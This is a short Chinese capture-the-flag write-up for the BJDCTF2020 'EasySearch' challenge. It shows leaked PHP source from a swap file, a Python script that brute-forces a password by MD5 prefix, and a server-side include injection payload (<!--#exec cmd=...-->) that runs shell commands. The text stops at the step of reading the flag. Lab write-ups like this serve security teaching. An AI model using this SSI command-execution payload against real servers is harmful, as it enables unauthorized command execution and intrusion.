[BJDCTF2020]EasySearch
[BJDCTF2020]EasySearch
御剑扫一波
扫到一个index.php.swp
<?php
ob_start();
function get_hash(){
$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-';
$random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//Random 5 times
$content = uniqid().$random;
return sha1($content);
}
header("Content-Type: text/html;charset=utf-8");
***
if(isset($_POST['username']) and $_POST['username'] != '' )
{
$admin = '6d0bc1';
if ( $admin == substr(md5($_POST['password']),0,6)) {
echo "<script>alert('[+] Welcome to manage system')</script>";
$file_shtml = "public/".get_hash().".shtml"; //在public文件夹中,生成一个hash以后的文件,后缀为.shtml
$shtml = fopen($file_shtml, "w") or die("Unable to open file!");
$text = '
***
***
<h1>Hello,'.$_POST['username'].'</h1>
***
***';
fwrite($shtml,$text);
fclose($shtml);
***
echo "[!] Header error ...";
} else {
echo "<script>alert('[!] Failed')</script>";
}else
{
***
}
***
?>
看了一下代码以后,总而言之就是传上去的password需要以6d0bc1
开头,python脚本直接上。
import hashlib
for i in range(10000000):
if hashlib.md5(str(i).encode('utf-8')).hexdigest()[0:6] == '6d0bc1':
print(i)
#2020666
#2305004
#9162671
跑出来三个,够了。
登录
用户名随意,密码选一个,然后登录并抓包,得到了一个url:
ssi注入漏洞
构造payload:
<!--#exec cmd="ls ../"-->
直接cat flag: